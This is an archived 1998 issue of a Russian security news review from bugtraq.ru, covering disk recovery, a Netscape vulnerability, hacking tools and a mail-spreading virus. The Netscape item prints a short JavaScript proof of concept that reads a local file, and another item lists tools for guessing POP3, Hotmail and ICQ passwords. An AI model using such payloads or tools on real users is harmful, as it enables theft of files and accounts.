 |  |
https://bugtraq.ru/review/archive/1998/08-12-98.html |
|
|||
|
|
|
||
| https://bugtraq.ru/review/archive/1998/08-12-98.html |
||||
| ||||
8 декабря 1998, #53
Мой призыв о помощи оказался услышанным. Буквально в тот момент, когда я, исчерпав все подручные средства, уже собирался с духом для переформатирования моего многострадального диска, пришло письмо от Temuri, вдохнувшее в меня надежду. С помощью Tiramisu, честно проработавшей несколько часов, мне таки удалось вытащить часть информации, с которой уже было распрощался. В общем, рекомендую, утилита из разряда "must have". Позволяет вытаскивать файлы с битых NTFS, FAT16, FAT32 и Novell'овских разделов. После долгой и продолжительной работы создается виртуальный диск, который можно просматривать, и с которого (в зарегистрированных версиях) можно скопировать обнаруженные файлы. По моей статистике шансы на успех - примерно 50 на 50, хотя не исключено, что на небольших винчестерах результаты будут получше.
Так что полуторанедельную эпопею с диском на этом можно считать законченной. Не считая потерянного времени, в итоге я оказался даже в выигрыше, потому как с горя прилично обновил железо :) Ну и от кучи накопленного за пару лет хлама избавился :)
Отчет о круглом столе подготовлен и выложен. На конец декабря (числа 24-го, окончательно будет известно позднее) запланирован еще один стол, более узкой направленности.
В процессе подготовки - американское зеркало HackZone. Окончательно оно будет доведено до ума в течение недели. Думаю, после этого процесс установки новых зеркал упростится.
А ведь обзору стукнул год - первый номер вышел седьмого, второй - девятого декабря. Поздравления принимаются :)
В конце прошлой недели случился некий обвал со взломанными сайтами. 9 штук и еще 97. Подробности - в Underground'е
Internet Dynamics приглашает потестировать прототип NTSAfe, включающего в себя средства проверки системных настроек, управления пользователями, группами, файлами, реестром и т.д. - через GUI и командную строку. Обещается, что и после выхода окончательной версии все это хозяйство останется бесплатным.
Очередная
дырка в Netscape, позволяющая считать файл на локальном диске и
передать его содержимое куда-то вдаль.
При этом используется следующий код на JavaScript:
sl=window.open("wysiwyg://1/file:///C|/");sl2=sl.window.open();
sl2.location="javascript:s='<SCRIPT>b=\"Here is the beginning of your
file: \";var f = new java.io.File(\"C:\\\\\\\\test.txt\");var fis = new
java.io.FileInputStream(f); i=0; while ( ((a=fis.read()) != -1) &&
(i<100) ) { b +=
String.fromCharCode(a);i++;}alert(b);</'+'SCRIPT>'";
Правда при этом открывается еще несколько вспомогательных окон, так что
пользоваться этой дырой не слишком удобно :)
Ожил сайт Сергея Протасова. Кстати, в этом месяце ему (сайту) исполняется аж два года. Информация стала более структурированной, до нужных документов стало легче добраться. Появился раздел "CGI scripts" - online-сканер портов, finger и т.д.
Серия утилиток от Eyewitness:
Gammaprog - подбор POP3-паролей и паролей для web-based почты (hotmail, usa.net, yahoo).
Thetaprog - подбор паролей Hotmail с помощью их же системы восстановления забытых паролей.
Xyprog - подбор паролей для ICQ.
Roprog - перевод IP-адреса в ICQ UIN (если ICQ там запущен, разумеется).
Upsilonprog - определение ICQ-порта.
Toprog - перехват ICQ-сообщений.
Все программки написаны на Java, исходники прилагаются.
Информация от ДиалогНауки - вроде бы просто очередной вирус, но примечателен способ распространения - при запуске на машине, подключенной к сети, он соединяется с NNTP-сервером, забирает с него первый попавшийся постинг в конференцию типа alt.hacker, alt.binaries..., определяет адрес отправителя и посылает ему некое письмо с приаттаченным зараженным файлом. А потом до кучи отправляет еще письмо на некий адрес с известием о заражении. Забавно.
На той неделе вышел John the Ripper 1.6. Среди новых возможностей - поддержка паролей NT (только LAN Manager'овых) и Kerberos AFS.
На KarDinal Zone под скромным именем NoName приютился раздел Hacking. Внутри - немного новостей, немного софта, немного ссылок, а также довольно приличная подборка русскоязычных текстов - некоторые достаточно известные, некоторые я встретил впервые. Пожелаем дальнейших успехов и напомним, что на странице ? обещано, что она откроется через 22 дня - 30 ноября :)
У вас есть новость или ссылка, заслуживающие внимания наших читателей ? Пишите.
| « | » | |
|
|
|